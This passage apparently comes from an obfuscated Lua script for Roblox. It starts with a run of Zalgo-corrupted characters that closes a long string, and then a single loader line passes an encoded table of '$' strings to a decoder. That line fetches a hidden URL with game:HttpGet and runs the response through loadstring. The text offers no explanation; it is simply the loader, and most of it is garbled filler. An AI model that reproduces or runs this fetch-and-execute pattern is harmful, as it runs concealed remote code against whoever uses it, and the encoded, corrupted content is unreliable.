Ì¨Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­,Ì´Í—ÌŽÌÌ‹ÌšÌ½Í•Í‰Ì¹ÍœÍœÌ¬Ì»mÌ¶Í›Ì»Ì–Ì¼Ì«ÌŸÌ¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì´Ì…ÌˆÌžÌ£Ì¦Í‰rÌ¶Ì…Ì’ÌÌƒÌÌ–ÍÍÌ®Ì¹Ì¥ÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì·ÍŠÌ‘ÌÌ½Ì‚Ì ÌŸÌ—Ì­Ì®Ì§Ì¹Ì¹Ì˜Í”wÌ¸Í›Í‘Ì‰Í˜Ì¨Ì§Ì Ì¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Í›Í€Ì‘Ì‰Í‘Ì‘Ì•Í’Í„ÌªÌ™sÌ¶Ì›ÌÍƒÌ“Ì‡Í—Í’ÍŠÌ”Í›Ì©Ì—Ì–Ì©ÍšÌ—Ì¨Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¸Ì“Í—Í‹Ì½Í’ÌšÌ•ÍŒÍ†Ì½Í–Ì¡Ì™ÌŸÍ‰tÌ¶Í„Ì†ÌÌ¡ÍœÌ¢Í‡Ì±Ì¡Ì¼ÌºÌ,Ì¸Í†Ì½Ì›Ì†ÌŽÌ‘Ì¦Ì¢Í‡oÌ¶Í›ÌƒÌ«Í‰Ì§Ì¡Ì²Í”Í“Ì¶Ì½ÍÍŒÍ’ÌÍ’ÍšÍ™Ì³ÌœÌ¨1Ì¸Ì¿ÌÌ¨Ì·ÌˆÍÍ€Í„Ì„Ì“ÍƒÍˆÌ—Í”Ì³ÌžÌ­Ì©Ì¬Ì©Ì˜lÌ´Ì‰Í‚Ì‰Ì‰Ì¾Ì…Í‘Ì‚ÌŸÌŸÌ–Ì¹ÍŽÍ…ÍšÌµÌ’ÌŸÌ—2Ì´Í†Ì¬Ì±Ì´ÌšÌ½ÌŠÍŒÌšÌ½Í†Í›ÌŠÍÌ—ÍœÌœÌŸÍ”Ì¼Ì²dÌ´Ì”Í‚Í›ÍƒÍƒÍ„ÍÍÌšÌŒÍ™ÍÍŽÌ¬Ì­ÌºÌ¸Ì‰Ì‘Ì•Ì¿Ì„ÌÍ ÌŠÌ­Ì—Ì¦3Ì·Ì‘ÍŽÍ™Í”Ì³Ì¤Ì¨Ì¦ÌµÍ—Ì‰Ì¿Ì›Ì‡Ì†ÍÌ§Í‡Í•Ì³kÌ¸Ì‘Ì‡Í„Ì•Ì›Ì…Í˜Í€Ì¡Ì–Í‡Ì™ÍœÌ±Ì®ÌµÍ†ÍšÍ“Ì®Ì»Ì³4Ì·ÌŒÌœÌ±Ì²ÌœÌ¶Ì“Ì†Í’ÍŽaÌ¶Í€Í„Í‚Ì“Ì•ÌšÍ’Ì½ÍŒÌ•Í…ÍŽÍ”Ì¶Ì‹Ì‘Ì•Í˜Ì‚Ì’Ì²Í™Ì£Ì®ÍˆÌ«Ì¼5ÌµÌ€ÌšÌ”Ì½Í ÍÌ¯ÌªÌ¢Ì¶ÌšÌšÌÌˆÌ½ÌˆÌ‡Í’Ì½Ì²yÌ¶Ì‡ÌÌ‘ÌÌÌ«Ì˜Í…Ì—Ì¨ÌµÌ†ÌŒÍ—Í‹Ì†Ì†Í‚Í†ÍƒÍ’Í‡Ì™Ì°Ì³Ì¦Ì£Í‡nÌ·Í’ÌˆÍ’Ì‘Í€Ì•Ì‘Ì°Ì©Ì Ì¦Ì¢Ì¸Í˜ÍƒÍÍ™Ì¼Ì¬Í™Í“ÌºÌ¬ÍœÌ˜Ì¬eÌ´ÌŠÍÌ’ÍŠÌ¾Ì“ÌŸÌ—Ì£Ì¢ÌÌ®ÍšÌ­.$Ì·Í›Í‚ÍÌ†ÍÍÌ’Í’Ì¦NÌµÌŠÍ—Ì¾ÍŠÍ„ÍŽÌ·Ì‘Í‚Ì Ì¢Í‰Ì£ÌžÌ°ÍÌ«EÌµÍÌ³ÌºÍÌ£ÌžÌ­Í”ÍÌ¢ÍˆÌµÌ‡ÍŠÌˆÍ’Ì¹Ì Ì¦Ì±Ì°Ì Ì¦WÌ´Í‚ÍÌŒÌ½Ì¾Ì€Ì–Í“ÌºÌ¯Ì™Ì¶ÌƒÌÌ³ÌºÍšÌªÍ‰Ì©AÌ¸Í Ì”ÌÍ™Ì°Ì«ÌžÌ·Í‘Í—ÌªÌ§ÌœÍ”ÍˆÌÌ­LÌ´Ì„Ì”ÌÌÍ‹ÌŒÍ‚ÌÍ“Ì™ÍœÌ¡Ì£ÍŽÌ®Ì°Ì¶Ì€Í„Ì•ÌÍ—Ì›ÌÌ¬Ì¹Ì—Ì²Ì­Í‡Í–BÌµÌƒÍŒÌ•Í˜Ì¹Í–Ì²Í‰Í–Í•Ì¸Ì‡Í‚Ì©Í…Í•ÍˆÌ²Ì³Ì³ÍŽÍ”Ì UÌ·Í˜Ì½ÌŒÌˆÍÍŽÍ™Ì·Í˜ÌšÌ­MÌ¶Í˜Í‚ÍÌ­ÌªÍ‰ÌºÌ¬Ì£Í“$}    
]]
loadstring(game:HttpGet(BVCzxjNazWtiRKQfQjkqLjljqksRMjVw({'$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$','$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$'})))()    
